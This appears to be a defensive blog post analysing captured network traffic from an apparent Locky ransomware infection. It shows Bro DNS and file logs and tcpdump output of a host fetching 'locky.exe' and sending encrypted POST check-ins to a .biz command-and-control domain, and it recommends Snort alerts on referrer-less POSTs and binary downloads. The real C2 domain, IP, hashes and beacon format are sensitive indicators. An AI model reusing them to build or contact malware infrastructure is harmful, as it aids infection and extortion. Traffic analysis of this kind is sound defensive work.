root@computersecurity:/var/log/bro/2016-06-28# zcat dns.18\:00\:00-19\:00\:00.log.gz | grep .biz
1467152335.499772 CkcKxg3Vgocx5ZP7Jj 192.168.1.100 55462 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152336.511728 C4Y4s5z3hBIdCnoe9 192.168.1.100 55463 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505404 CvpNyI34kpJnmHYJ6e 192.168.1.100 55462 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505803 CjkpHg1Wv2ApzPn2D1 192.168.1.100 55464 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.857609 C3u42t4W5TL1Nojhsd 192.168.1.100 24552 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152338.505541 Co5Hqy1qM8cU8rcph 192.168.1.100 55463 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152338.843204 Ccl0T84oBNlsGJcE6c 192.168.1.100 50262 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152339.507084 CVEg303R9VQw6MigZk 192.168.1.100 55464 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F

root@computersecurity:/var/log/bro/2016-06-28# zcat files.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152338.072969       FUEGOP2CN9E2bA2xIf      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1126    1126    0       0       F       – 873420329f0835e13de6b696e31353e8 f933bcc846985318b2b574801e442ab98494b14b        –       –
1467152338.467968       FJQWHF1BLLIO3la3p1      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       313     313     0       0       F       –       2986b2044d6bb6a5dafb4e2966c26d1a   9f6a15adf63c7c2b1ae5bbaa627742db86fceade        –       –
1467152338.581431       F4FVGV3dQLX8tHAir6      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       790     790     0       0       F       – 9697ae3ef8f8f7ce2c6c70c69690ff16 26b0b1cbc1be7361db78b125bd2a9df05b5b7df1        –       –
1467152338.966439       FFqoA33xdIAhANt7nd      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       1195    1195    0       0       F       –       f7d46ab6b7754b656669da1046c77e30   8058dabfe112e1d84458170c01292423f3f8aa2b        –       –
1467152338.968820       F3vIQz1MXORQkl871i      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       490     490     0       0       F       – 2bf68f81591033199bdb28b2bd7aadc8 ad28c783a43dfa1594d44d1a96d4482248a9d113        –       –
1467152339.368526       FY1BJMa0OBilCocI1       151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.070727        F       F       9491    9491    0       0       F       –       26931832cc92296c9c037803530da456   a0bf3aea40193ab452745675b24eeb96c78e6477        –       –
1467152342.155877       FeOxTb4AK7XOgpZ3B4      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1201    1201

 

If you are creating Snort rules in a very paranoid manner you may have detected the payload request or POST requests without a referrer. Creating Snort rules based on URI content is a frivilous endeavor as almost all crimeware groups these days use hacked infrastructure to host their malicious content. If you think a POST request to /wp-content// you have much to learn. These kiddies are Google dorking the latest stored XSS and SQLi to upload their package, there is nothing finite about this location. If your client base is small enough it would be smart to create rules that alert on binary downloads and POST requests without referrers using a whitelist based method. Detecting this below type of traffic as malicious will become axiomatic.
E..c66…..r…kh.T….P’..@.U.DP…1…GET /images/samples/locky.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2016-06-28 18:18:57.969089 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 2729606803, win 256, length 0
E..(\…..t….k…..\.Pl…..~.P….7……..
2016-06-28 18:18:57.969599 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 0:411, ack 1, win 256, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sO…k…..\.Pl…..~.P…”…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1126
Connection: Keep-Alive
2016-06-28 18:18:58.072969 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 411:1537, ack 1, win 256, length 1126: HTTP
E…\…..p….k…..\.Pl…..~.P….M..qhhxAGOv=%D1%98%85%5C%05%99lh%F6%FDL%9A%D7%06%18%7B%A9%D15%3A%185%29%12%99BM%A0%C0%BEf%DA&BFfex=%DA%08y%88%AE%08%3C%01%3DO%B8%14B%15%D5&xMvFbKR=M%8D%FF%22%00%1D%D1%AD%AC%C
F9%E5%FBw%D9R%1C%89–%F9%22R%C9%A3%5B4%5CH%27%889Q-%8F%156u%9A%24%AF&xaN=%E0%0F5%CE%27%0B%2A%0A%7CHzu%87%8A%CD%B9%DAD%F2%F9%B0%D6%94gI%0F%3Fp%B0%08%DA3%E5%97%97%C5%7B%AF%1A%95%FC&IbGveoKJ=B%AE%8D%22%EB%F6%08%F6%
7E%D0%8FW9Q%D2%01%B0NE%0C%0E%A5%266%E0%1C%C6vt%3C%D9J%8Et%A0%22&vxzi=%9F%E1%FD%93%0A%E6%FA%3D%F4%99%C6%FE%C7x%BE%B4%14%5D%00%EDp%C3B%1B%26u%A7%0A%CEC%DC%CBi%9D%EB%3F%1F%B64%91%94%C4%80%81yo%0B%09&jGkdcQzo=%E2Z%A
2%A7o%EB%C7%3ECe%C6%A1%F4%A6k0%26%93%9B%B8%9E%0Fb%83%E3kS%16g%D6%FA%B3%FD%FE%E8%FAx%DB%8E%0A%FE%F44%3Cg%18%D6%BA%01%EF&MzAP=%F8%1F%D3zy%C64%FB%1F%97%8A%89%86%82%2CR%C8%FC%18%C7%3Dei%C4%B8%B9%173G&luuff=%CB%09%88
%94%C0%0A%A4%E1%B6%EFY%FB%BCs%3F%C3%FE%B1%A5%DA%2A%B2%2F%04%0B%D0F%BC%28%F3%86%CAE%2F-%D8%BB%87%CBy%3D%EF%A1%DB%B2%BA%60%D3&SjY=%B6%C8%C7%04%E8f%03%07+%40%B6Y%CF%FFV%AF%0B5%A7c%BC8%AE%BF%7C%97Q%D73%1F%BF&IdEM=%9
6%25%DC%40%9F%C1%AF%A8%14%AC%9B%BFf%89%B6%D1%08%FC%90d%B3%8D%05%EF%3E%5EC%E2.y%82%1A%5C%DD%3F%13%CDF%91%BC%E69c
2016-06-28 18:18:58.470622 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1537:1947, ack 470, win 254, length 410: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sN…k…..\.Pl……hP…h…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 790
Connection: Keep-Alive
2016-06-28 18:18:58.581431 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1947:2737, ack 470, win 254, length 790: HTTP
E..>\…..q….k…..\.Pl……hP…9C..uoYu=o%5C%FF%C8%C0P%EC%25%28%2F%B3%95%F6L%D1%1B%CE%C8R%BEf%ED%D3W%88%89%2F&ERKKdCXA=%C6%8A6%A8j%7Ea.x%1C%D7%03%0D%28IR%EF%F4%04%2F%FFr%B5%89%E8%95%E9%01%D8%99%D2ikiu%9F&brnXZ=_%DA%878%84%90%29%1D%C0rL%CD%13%BEn%F8%AA%B3%842A%F2%B1%03&jhUtKvK=%D6%B4%9AF%18b%0A%A3%B9%8A%1B7%08y%DA%DDF%84Q%14%0Fq%C9%9F%94%0F%AE%A6T%87%8D%A8%E8%A0%DAn%B2%B6%C4%AE+%E2%97&VKTm=%F3%CB%04%AA%ED%D9Ud%21%40%810%3E%DCZP%AC%84%CA%883%FC-%8D.%ADD%92%A1%E0%7DW%84%D7%96Je%FD%F7%0C%BB%E7%FB%02%D5%DF&Rxu=1%FA%94%CF%0F%FC%5EaG%B3%1B%83j%CCBa%DA%A6%A8n%C3%D8%F2C&vbJTIM=o%A8%8A%01%12%B2%AA%9A%C3%A6%84N%ED%12%8D%AF%3E%D8%23%C6%EEN%ED%C8%BC%E4%5B%D9%A9%86%DE%DB%B9%C4%D4%7E&IfQDnFS=%17%DF%1C%2C%7B%B0x%BE+%94SC%24d%97N%F1Q%C0%F1%A3%A6D%AF%8Br_%AC%C8%1Dy%DB%FAK%E0%E3a%0D%12W%C7%E6%98%3C%D1%B2&FFcT=%BF%7BI%1DL%5Ck%E5H%A7M
2016-06-28 18:18:58.968820 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 2737:3637, ack 1822, win 256, length 900: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..qb…k…..\.Pl…….P…p!..POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 490
Connection: Keep-Alive

NrpyxWG=%2C%80%22%FD%92V%2A%8D%CA%2B%BFq%02%EA%5Cf0l%C0%B40%1E%12%F9%84%12%FA%9C1&QWo=%E7%F7%F7%17%89m%3C%D5%88%7F%1F%24%80%90%DA%D7%FCV&nYuMPFS=%AC%3B%B3%F2%96GD_%17%E4%3F%1E%C0%DE%9B%DAI2%F3E%C3PV%85%C1%5Dr%1F%95l%01%5B%00%C9%98ES&wVmT=Z%94%0F%BF5%A1%B4%7C%BD%2A%EB7%0D%5D%E0%DB%7F%D7%1B%CE%81k3x%B3t%AE%EB%84H%B3%3B%84Or%10&RugliT=%1E%2B%B69%0C%18%EA7p%28%E8%E0%8CKSg%DAq%89%00%26%26%93%8F%B5b%10%29%C6&JajgLtjP=%D2%07%7CW%FC%2F%8D%BC%AE%B3Y%DD%06%9D%17%D2%AB%CC%8A%8C%CF%87%E0%1F%22+%7D
2016-06-28 18:18:59.369955 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 4742, win 256, length 0
E..(\ ….t….k…..\.Pl../….P….}……..
2016-06-28 18:18:59.371198 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 7401, win 256, length 0
E..(\
….t….k…..\.Pl../…{P………….

2016-06-28 18:19:02.054922 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 3637:4048, ack 11470, win 251, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sF…k…..\.Pl../…`P…….POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1201
Connection: Keep-Alive
2016-06-28 18:19:02.155877 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 4048:5249, ack 11470, win 251, length 1201: HTTP
E…\…..p/…k…..\.Pl……`P…….JpByd=x5%90d%F6%0Dy5%C8%A2%A1%D0J%2B%1D%15%87%3F%B4%2C&nJCDmH=%5B%CB%81%80%23%03%E5%3F%E1%A9wN7%E5%C8%D6%B8HMi%A5%A7%5B%60%01Fdi-%D4%F3%F4%3D%93%08q%A5b%9A%B55%15%96%DCW&qdZEWyNE=gY%28%EB%00%E6%0D%DE%5EN9%FFt%26%EA%C8%CE%60%09%03%B3JH&mwjESzr=%FF%D7B%FDr%84%ECT%87%B8%A5%9AS%1E%9D%98%AES%D1%81%D6%A9N%D1%C9%E2f%EA%8ENWi%7D%BF%950%95%BFE&plR=%C4%AEm%01%93%83%C0%9B%D3%7D%1Cx%22e%B5%9DJ%FCF%17%A4%25%3B&qieYfPY=MRR%8FU%CA%24%83%FF%A6%82%D7e%DF%3E%18%BBB%B0&ZjtvTgwY=%5E%D4%B6%F2E%CD%CF%B8%3A%8A%9B%FD%A4%93S%F9mK%B5%AC%22%E3%29%1BM%E7%2B7%E5kiQ%F1%AA%A8%23%EB%B4x%B3%83&olFyl=4G%92%AE%13%B8%18%28%99%E7%3F9D%B0%87%9C%5Bp%CCAQo%0B%269%E4V&kvU=%17%DBS%B2%FB%E3%A8%8D.A%A3%A0%0B%FCn.4%02%25X%88%00MRj%3D%F6%B7%5B%7E&IsEhd=%EB%1Ds%8C%0E%D3Z%E7%F1lp%3F%7E%C2_%C1%BDJ%01%A2%8C%10%A3XDA%B0L%3F%E3&wqfi=%C8L%FAU%B5%8A%0B%7B%0A%B2%D8%18%3BO%EB%AB%23H%BAF%CC%C3h%DBX%A2%0D%B5-%C4%ED%03%08%C8O%8F%C3%D9&PkzlsNj=%29%09%23J%0CkD%BBj1%FB%C2AVV%2Cl%C6%26%9E4%1C%80%3A%A9%034%C9%ED%E63%F2&zKqqM=%CA%86%B4%0Dc%E7%C0%85%9A%0E%E1Z%5B%E9%86%0D%C1%CE%05%3C%85%9D%11%DF%18&qHuJo=g%ABxSUa%F11%C3%9B%05%DB%09%A5%28%AA%C8b%85%0B4n%27k%1BG&EhsFEGN=%88i.n%16%AD3%7E.p%C6%AF%C2%B6%03%9B%2B%E3C%8A%29%1F%FE%F5Oe2%0Et%DF%C3%D9B%CE%85
2016-06-28 18:19:02.611867 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 11881, win 256, length 0
E..(\…..t….k…..\.Pl.#{….P….N……..

 

Share Button